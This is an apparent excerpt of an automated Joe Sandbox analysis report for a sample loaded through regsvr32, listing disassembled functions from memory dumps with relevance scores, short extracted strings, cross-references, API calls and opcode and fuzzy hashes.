Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: Process$CurrentPrng
String ID:
API String ID: 716580790-0
Opcode ID: 4e1d21dcb0f84e24a9a07dff92e70f91c53a1ae1f6bcaa5b1fac968b579dc2e7
Instruction ID: c5297fd14fff288f514d60458cc0a0aae4dc5dadda519aa7a0eefd68a92b9423
Opcode Fuzzy Hash: 4e1d21dcb0f84e24a9a07dff92e70f91c53a1ae1f6bcaa5b1fac968b579dc2e7
Instruction Fuzzy Hash: C2221623B0AA828AE714AF21D4603BD37A2BB047D8F144A36EE5D57BD6DF7ED5418304

Function 00007FFD34360F88 Relevance: 9.3, Strings: 7, Instructions: 592COMMON

Download Yara Rule

Strings

1M_^, xrefs: 00007FFD34361301
@3A4, xrefs: 00007FFD3436159F
@3A4, xrefs: 00007FFD34361429
@3A4, xrefs: 00007FFD34361402
@3A4, xrefs: 00007FFD343613BD
@3A4, xrefs: 00007FFD343615DA
@3A4, xrefs: 00007FFD34361458

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: 1M_^$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-1136826106
Opcode ID: 9b31750a00e79469ca660b6da72a3128e4b2c6d7cb0bcac07d3e0e9f717d2c10
Instruction ID: 0c0e966a99079afe70eacb59d5fc52e342d4b933755ca07bd34b26392a81a64c
Opcode Fuzzy Hash: 9b31750a00e79469ca660b6da72a3128e4b2c6d7cb0bcac07d3e0e9f717d2c10
Instruction Fuzzy Hash: 4B02E316B0E5A71AEE64B7ACA4F31FA7794DF43338B0802B6D5CCDB283DC1D68465285

Function 00007FFD3455851D Relevance: 7.9, Strings: 6, Instructions: 384COMMON

Download Yara Rule

Strings

htE4, xrefs: 00007FFD3455879A
@3A4, xrefs: 00007FFD3455880A
htE4, xrefs: 00007FFD34558887
(C^4, xrefs: 00007FFD34558931
@3A4, xrefs: 00007FFD345585A4
htE4, xrefs: 00007FFD3455873F

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: (C^4$@3A4$@3A4$htE4$htE4$htE4
API String ID: 0-666281828
Opcode ID: 24a50f50b35fd25e8d2297f7be43c434d340bcde0a29412a38970708b0a6ddcb
Instruction ID: dea697ccab4d91ec68b987d15f6195293657b7b103e561e43ca6cd4290b8785a
Opcode Fuzzy Hash: 24a50f50b35fd25e8d2297f7be43c434d340bcde0a29412a38970708b0a6ddcb
Instruction Fuzzy Hash: AFC1F521B1DA494FE795EB2884F62B9B7D2FF9A310B4401BED04EC72D3CE2DA8419741

Function 00007FFD343611FA Relevance: 7.9, Strings: 6, Instructions: 352COMMON

Download Yara Rule

Strings

1M_^, xrefs: 00007FFD34361301
@3A4, xrefs: 00007FFD34361429
@3A4, xrefs: 00007FFD34361402
@3A4, xrefs: 00007FFD343613BD
@3A4, xrefs: 00007FFD343615DA
@3A4, xrefs: 00007FFD34361458

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: 1M_^$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-2794628847
Opcode ID: da5fc59ae75478c45f7e8a37bf9b27fe75fec16ade27c2fc0d05f8c8083b3bb8
Instruction ID: 5b9001a485a29f9466a44901b9802ecf1193bd7562439e58e24e1d65e3140e85
Opcode Fuzzy Hash: da5fc59ae75478c45f7e8a37bf9b27fe75fec16ade27c2fc0d05f8c8083b3bb8
Instruction Fuzzy Hash: 41A1F226B0D5971AEE58B7AC64F31FA77D4EF53338B0802BAD58DC7283DC1D68425285

Function 00007FFD3435A575 Relevance: 5.6, Strings: 4, Instructions: 633COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435F128
@3A4, xrefs: 00007FFD3435F0EA
@3A4, xrefs: 00007FFD3435F074
@3A4, xrefs: 00007FFD3435F0A5

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: 916d88c6b5d0335b46b2cb9857036a6d9f1e45103f1e849756c4f1e18c9661a8
Instruction ID: 00cc7c0f88b4c0eace4138912e05f307ea9e68ce8ff7e2c108708b91b3dceab7
Opcode Fuzzy Hash: 916d88c6b5d0335b46b2cb9857036a6d9f1e45103f1e849756c4f1e18c9661a8
Instruction Fuzzy Hash: AA12B330B589198FEB84FB18C4E6AB973E1FF99314B404279D50DC3292DE3DB8419B85

Function 00007FFDA339A1B0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

BCryptGenRandom.BCRYPT(?,?,?,00007FFDA3399CF5,?,?,?,00007FFDA33875E3), ref: 00007FFDA339A1F2
SystemFunction036.ADVAPI32(?,?,?,00007FFDA3399CF5,?,?,?,00007FFDA33875E3), ref: 00007FFDA339A205

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: CryptFunction036RandomSystem
String ID:
API String ID: 1232939966-0
Opcode ID: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
Instruction ID: 8ee1dd7c6a76fe78c72b7f9f149a05870d70875edc530b5ce6636ccee045747c
Opcode Fuzzy Hash: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
Instruction Fuzzy Hash: 6AF0B452F0F95945FE7934662E6457590430F297F0D288335AD3DABBE7AC6AE8432208

Function 00007FFD343530B9 Relevance: 2.4, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

M_L, xrefs: 00007FFD34353874

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: M_L
API String ID: 0-290739141
Opcode ID: cb684a89223f5b3c5f4bbfe8e62a1c119686d86beab365819887d2415a301128
Instruction ID: 651253334393ce5c45c486008080adda8dfa7f525706e782b933d8add8cf6101
Opcode Fuzzy Hash: cb684a89223f5b3c5f4bbfe8e62a1c119686d86beab365819887d2415a301128
Instruction Fuzzy Hash: 12720631B4C9494FEB68EA58C8A66B873D1FF95310F1402F9D55EC7292DE38BC468782

Function 00007FFD3455308D Relevance: 1.0, Instructions: 1042COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42d62b76ce351cc3b2edb9238a129efda5f09f15fbd608db181a48d2dadf99d
Instruction ID: 1d5ac943eab38defd9c498d6c9702fef79eda5b313722a63b8b79b52e432475b
Opcode Fuzzy Hash: e42d62b76ce351cc3b2edb9238a129efda5f09f15fbd608db181a48d2dadf99d
Instruction Fuzzy Hash: FD72A870A0DA498FDB96EF28C4A4AB57BE1FF66304F1441E9D04EC7292DE39E846C741

Function 00007FFD345252C2 Relevance: .6, Instructions: 586COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4757f0412d2c8b6c09c0bc7c2686323dc33c5aab3f43f7445f055b145d1347
Instruction ID: 47da3bf244091c27d6644114e0a7985bede75945272ff703550ba5f9142d3c5e
Opcode Fuzzy Hash: 9f4757f0412d2c8b6c09c0bc7c2686323dc33c5aab3f43f7445f055b145d1347
Instruction Fuzzy Hash: B2F17111F5DE4F0BEAE7AA2804F517D26D2EF97290B5800BBD64DC72C3DD2CB806A245

Function 00007FFD343530D0 Relevance: .6, Instructions: 556COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b0eee25f199c8d9cc694ba3adba5395537488074a06e6a4d499b38133c56e4
Instruction ID: 0041ff28179dccefbec2c66b75bd6bfe393a0e74d3748fdb82a973585c3b471b
Opcode Fuzzy Hash: 08b0eee25f199c8d9cc694ba3adba5395537488074a06e6a4d499b38133c56e4
Instruction Fuzzy Hash: BCF1D471B0891D4FEB68EA6C889577873D1FB99311F1402B9D99ED3292DE38BC438781

Function 00007FFD34352C48 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 129689170d262ea574d0a749edae01c7bae68435ff25eeac55bd2b55f1078519
Instruction ID: 985f15d58e28c4c24a9e067a8bc355c2660b1f9625b48610e1b70b9c28931373
Opcode Fuzzy Hash: 129689170d262ea574d0a749edae01c7bae68435ff25eeac55bd2b55f1078519
Instruction Fuzzy Hash: C6918471A1894E9FE798EB58D8A67A97BE1FB55315F40017AD00DD33A2CE7D2805CB80

Function 00007FFD3435217A Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3edf6d7fb55ec98be2c54e9b3f802fc3b9f5e6acc22f916113606c89b8412cc
Instruction ID: 0c9f6d7b9850984ce52aadfe6dbb78dff990acc7372d4cb344563d82769249cf
Opcode Fuzzy Hash: b3edf6d7fb55ec98be2c54e9b3f802fc3b9f5e6acc22f916113606c89b8412cc
Instruction Fuzzy Hash: D051F421A4D6C50FE792A76894A03A53BE2EFCB320F0901FBC149CB193CE7D68469751

Function 00007FFD34355829 Relevance: 78.8, Strings: 62, Instructions: 1298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD34356456
@3A4, xrefs: 00007FFD34355DD9
@3A4, xrefs: 00007FFD34355BC9
@3A4, xrefs: 00007FFD3435629E
@3A4, xrefs: 00007FFD34355CDE
@3A4, xrefs: 00007FFD34355A32
@3A4, xrefs: 00007FFD3435627A
@3A4, xrefs: 00007FFD34356021
@3A4, xrefs: 00007FFD34355B21
@3A4, xrefs: 00007FFD34356045
@3A4, xrefs: 00007FFD34355EFC
@3A4, xrefs: 00007FFD343563FB
@3A4, xrefs: 00007FFD34355A8C
@3A4, xrefs: 00007FFD343560CD
@3A4, xrefs: 00007FFD34356165
@3A4, xrefs: 00007FFD34355ABE
@3A4, xrefs: 00007FFD3435618E
@3A4, xrefs: 00007FFD343561D9
H*54, xrefs: 00007FFD34356621
@3A4, xrefs: 00007FFD343560F3
@3A4, xrefs: 00007FFD34356535
@3A4, xrefs: 00007FFD343558DE
@3A4, xrefs: 00007FFD34355932
@3A4, xrefs: 00007FFD34356367
@3A4, xrefs: 00007FFD34356588
:, xrefs: 00007FFD34355D1B
@3A4, xrefs: 00007FFD34355AF0
@3A4, xrefs: 00007FFD34356431
@3A4, xrefs: 00007FFD34355CB7
@3A4, xrefs: 00007FFD34356090
@3A4, xrefs: 00007FFD3435606C
@3A4, xrefs: 00007FFD3435611A
@3A4, xrefs: 00007FFD34355FAF
@3A4, xrefs: 00007FFD343559D9
@3A4, xrefs: 00007FFD3435622C
@3A4, xrefs: 00007FFD34355FFB
@3A4, xrefs: 00007FFD343564EA
@3A4, xrefs: 00007FFD343563D5
@3A4, xrefs: 00007FFD34356330
@3A4, xrefs: 00007FFD343562C5
@3A4, xrefs: 00007FFD34355906
@3A4, xrefs: 00007FFD343565D3
@3A4, xrefs: 00007FFD3435664C
@3A4, xrefs: 00007FFD3435613E
@}A4, xrefs: 00007FFD343564A4
@3A4, xrefs: 00007FFD34355F40
@3A4, xrefs: 00007FFD34355A58
H, xrefs: 00007FFD34356572
@3A4, xrefs: 00007FFD34356253
@3A4, xrefs: 00007FFD34355D57
@3A4, xrefs: 00007FFD34355D92
@3A4, xrefs: 00007FFD34355F64
@3A4, xrefs: 00007FFD34355F8B
@3A4, xrefs: 00007FFD343558B7
@3A4, xrefs: 00007FFD34355BF2
@3A4, xrefs: 00007FFD34355A06
@3A4, xrefs: 00007FFD34355D22
@3A4, xrefs: 00007FFD3435586C
@3A4, xrefs: 00007FFD3435588E
@3A4, xrefs: 00007FFD343561B2
@3A4, xrefs: 00007FFD34355FD6
@3A4, xrefs: 00007FFD343561FD

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: :$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@}A4$H$H*54
API String ID: 0-2302672141
Opcode ID: 12733a09eb1587f1d29658bf825afc7bd60aff60cea72a49324f3890e14ad7c9
Instruction ID: b16d563f45f10d15ed73b88426a76503d1538dd6ed4e9119026920954b466f91
Opcode Fuzzy Hash: 12733a09eb1587f1d29658bf825afc7bd60aff60cea72a49324f3890e14ad7c9
Instruction Fuzzy Hash: D592D562B5D98A4BEB98F75884B22B4A2C2FF9A750F4402FAD10DD33C3DD2D78415786

Function 00007FFD34355E68 Relevance: 50.7, Strings: 40, Instructions: 684
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD34356456
@3A4, xrefs: 00007FFD34356090
@3A4, xrefs: 00007FFD34355FAF
@3A4, xrefs: 00007FFD3435606C
@3A4, xrefs: 00007FFD3435611A
@3A4, xrefs: 00007FFD3435629E
@3A4, xrefs: 00007FFD3435622C
@3A4, xrefs: 00007FFD34355FFB
@3A4, xrefs: 00007FFD3435627A
@3A4, xrefs: 00007FFD34356021
@3A4, xrefs: 00007FFD343564EA
@3A4, xrefs: 00007FFD343563D5
@3A4, xrefs: 00007FFD34356045
@3A4, xrefs: 00007FFD34355EFC
@3A4, xrefs: 00007FFD34355E72
@3A4, xrefs: 00007FFD343563FB
@3A4, xrefs: 00007FFD343560CD
@3A4, xrefs: 00007FFD34356330
@3A4, xrefs: 00007FFD343562C5
@3A4, xrefs: 00007FFD343565D3
@3A4, xrefs: 00007FFD34356165
@3A4, xrefs: 00007FFD3435664C
@3A4, xrefs: 00007FFD3435613E
@}A4, xrefs: 00007FFD343564A4
@3A4, xrefs: 00007FFD34355F40
H, xrefs: 00007FFD34356572
@3A4, xrefs: 00007FFD3435618E
@3A4, xrefs: 00007FFD34356253
@3A4, xrefs: 00007FFD343561D9
H*54, xrefs: 00007FFD34356621
@3A4, xrefs: 00007FFD34355F64
@3A4, xrefs: 00007FFD343560F3
@3A4, xrefs: 00007FFD34355F8B
@3A4, xrefs: 00007FFD34356535
@3A4, xrefs: 00007FFD34356367
@3A4, xrefs: 00007FFD34356588
@3A4, xrefs: 00007FFD343561B2
@3A4, xrefs: 00007FFD34355FD6
@3A4, xrefs: 00007FFD343561FD
@3A4, xrefs: 00007FFD34356431

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@}A4$H$H*54
API String ID: 0-3593054924
Opcode ID: e4fb6d264d59f2ea4e4521913bda22b2e289af01d428c4ed91afa0c53b195fc7
Instruction ID: 921b19063d65be490d2333b219ce3287bc667282a3e347ec57271499f78281c7
Opcode Fuzzy Hash: e4fb6d264d59f2ea4e4521913bda22b2e289af01d428c4ed91afa0c53b195fc7
Instruction Fuzzy Hash: FF22B362B9C98A4BF798F71884B22B4A2C2EFDA754B4402F9D10DD32D3DD3DB8415786

Function 00007FFD34355EA8 Relevance: 49.4, Strings: 39, Instructions: 679
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD34356456
@3A4, xrefs: 00007FFD34356090
@3A4, xrefs: 00007FFD34355FAF
@3A4, xrefs: 00007FFD3435606C
@3A4, xrefs: 00007FFD3435611A
@3A4, xrefs: 00007FFD3435629E
@3A4, xrefs: 00007FFD3435622C
@3A4, xrefs: 00007FFD34355FFB
@3A4, xrefs: 00007FFD3435627A
@3A4, xrefs: 00007FFD34356021
@3A4, xrefs: 00007FFD343564EA
@3A4, xrefs: 00007FFD343563D5
@3A4, xrefs: 00007FFD34356045
@3A4, xrefs: 00007FFD34355EFC
@3A4, xrefs: 00007FFD343563FB
@3A4, xrefs: 00007FFD343560CD
@3A4, xrefs: 00007FFD34356330
@3A4, xrefs: 00007FFD343562C5
@3A4, xrefs: 00007FFD343565D3
@3A4, xrefs: 00007FFD34356165
@3A4, xrefs: 00007FFD3435664C
@3A4, xrefs: 00007FFD3435613E
@}A4, xrefs: 00007FFD343564A4
@3A4, xrefs: 00007FFD34355F40
H, xrefs: 00007FFD34356572
@3A4, xrefs: 00007FFD3435618E
@3A4, xrefs: 00007FFD34356253
@3A4, xrefs: 00007FFD343561D9
H*54, xrefs: 00007FFD34356621
@3A4, xrefs: 00007FFD34355F64
@3A4, xrefs: 00007FFD343560F3
@3A4, xrefs: 00007FFD34355F8B
@3A4, xrefs: 00007FFD34356535
@3A4, xrefs: 00007FFD34356367
@3A4, xrefs: 00007FFD34356588
@3A4, xrefs: 00007FFD343561B2
@3A4, xrefs: 00007FFD34355FD6
@3A4, xrefs: 00007FFD343561FD
@3A4, xrefs: 00007FFD34356431

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@}A4$H$H*54
API String ID: 0-1835446601
Opcode ID: bd66096c2956a1841ca4f0555d43749fcf6eca4c5b4bba571a62b817c03fffc0
Instruction ID: a1705d5f45c61f7fc566f11e1a1b5d4cfd9287d54c07eb1d3b5843900759e69c
Opcode Fuzzy Hash: bd66096c2956a1841ca4f0555d43749fcf6eca4c5b4bba571a62b817c03fffc0
Instruction Fuzzy Hash: 1E22B362B9C98A4BE798F71884B22B4A2C2EFDA750B4402F9D10DD33D3DD3DB8415786

Function 00007FFDA33D1830 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 272
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FFDA33D18B2
CloseHandle.KERNEL32 ref: 00007FFDA33D1994
WaitForSingleObject.KERNEL32 ref: 00007FFDA33D19A1
GetLastError.KERNEL32 ref: 00007FFDA33D19AA
CloseHandle.KERNEL32 ref: 00007FFDA33D1A29
CloseHandle.KERNEL32 ref: 00007FFDA33D1A32
CloseHandle.KERNEL32 ref: 00007FFDA33D1B29
CloseHandle.KERNEL32 ref: 00007FFDA33D1B6F
CloseHandle.KERNEL32 ref: 00007FFDA33D1B78

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FFDA33D1935, 00007FFDA33D1A8E, 00007FFDA33D1ABC

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: CloseHandle$ErrorLastObjectSingleWait
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 1454876536-2333694755
Opcode ID: ab81b0607d95766b5d9cfa66bc362d198cee87a77d5559b4752dc2213c3f31e5
Instruction ID: 3407043023d76ea1fd503bd0bdd197377e319c1e9fbbf4e954eeaedaa4b6ed39
Opcode Fuzzy Hash: ab81b0607d95766b5d9cfa66bc362d198cee87a77d5559b4752dc2213c3f31e5
Instruction Fuzzy Hash: 09C18F32F09A868AEB54AF61E4603FC3762BB44788F144431EE4D67B9ADF7AD581C344

Function 00007FFD3435F80D Relevance: 21.9, Strings: 17, Instructions: 651
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

cb, xrefs: 00007FFD3437146E
@3A4, xrefs: 00007FFD343714D4
@3A4, xrefs: 00007FFD343716EA
@3A4, xrefs: 00007FFD34371629
@3A4, xrefs: 00007FFD343715D1
@3A4, xrefs: 00007FFD34371884
HH4, xrefs: 00007FFD343718E1
@3A4, xrefs: 00007FFD34369F89
@3A4, xrefs: 00007FFD34371423
@3A4, xrefs: 00007FFD343717C4
@3A4, xrefs: 00007FFD34371450
@3A4, xrefs: 00007FFD343715FD
@3A4, xrefs: 00007FFD343767CB
@3A4, xrefs: 00007FFD343716C3
3Z, xrefs: 00007FFD34371647
@3A4, xrefs: 00007FFD343717FF
@3A4, xrefs: 00007FFD3437158A

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$HH4$3Z$cb
API String ID: 0-3785232885
Opcode ID: e6290be1bc3abedd8164c4f05cfb4d282985c0cf5359b4e01a547548bb9e4dd4
Instruction ID: b5d14861e77ec20f0af56d229e00b1deed04ed8c3e8c632403fcb241dbb6a356
Opcode Fuzzy Hash: e6290be1bc3abedd8164c4f05cfb4d282985c0cf5359b4e01a547548bb9e4dd4
Instruction Fuzzy Hash: 9612F422B5C94A4FEF98FB6888A62B877D1EF9A310F44417AD54DD3382DD3CB8418785

Function 00007FFD343601F5 Relevance: 21.7, Strings: 17, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD343604CB
@3A4, xrefs: 00007FFD34360562
@3A4, xrefs: 00007FFD34360357
@3A4, xrefs: 00007FFD343605F3
@3A4, xrefs: 00007FFD343602F7
@3A4, xrefs: 00007FFD3436038D
@3A4, xrefs: 00007FFD3436062F
@3A4, xrefs: 00007FFD34360533
@3A4, xrefs: 00007FFD3436031F
@3A4, xrefs: 00007FFD3436026F
@3A4, xrefs: 00007FFD3436046B
@3A4, xrefs: 00007FFD343602AE
@3A4, xrefs: 00007FFD3436058D
@3A4, xrefs: 00007FFD343603B5
@3A4, xrefs: 00007FFD34360402
@3A4, xrefs: 00007FFD34360494
@3A4, xrefs: 00007FFD3436069A

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-523893428
Opcode ID: 380f904d401ccf3718b8f210b9bd37eaed3e4a5f47837b874fe14486a5853eab
Instruction ID: e082211811a853cb9bb18a0c9dfbcda849f2ec0efebe68918a7f2fa5621ff06a
Opcode Fuzzy Hash: 380f904d401ccf3718b8f210b9bd37eaed3e4a5f47837b874fe14486a5853eab
Instruction Fuzzy Hash: 1AE1A321B5C95A4BEB58FB5894E21F9B3E1EF8A724F04017AE54DD32C2DE3CB8015B85

Function 00007FFD3455A620 Relevance: 21.6, Strings: 17, Instructions: 365
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD3455B3D2
@3A4, xrefs: 00007FFD3455B411
@3A4, xrefs: 00007FFD3455B679
xkF4, xrefs: 00007FFD3455B39C
@3A4, xrefs: 00007FFD3455B6A0
@3A4, xrefs: 00007FFD3455B6FD
@3A4, xrefs: 00007FFD3455B471
@3A4, xrefs: 00007FFD3455B5A1
@3A4, xrefs: 00007FFD3455B4BC
@3A4, xrefs: 00007FFD3455B502
@3A4, xrefs: 00007FFD3455B565
@3A4, xrefs: 00007FFD3455B52B
@3A4, xrefs: 00007FFD3455B652
@3A4, xrefs: 00007FFD3455B727
@3A4, xrefs: 00007FFD3455B43A
@3A4, xrefs: 00007FFD3455B5C8
@3A4, xrefs: 00007FFD3455B498

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$xkF4
API String ID: 0-122209077
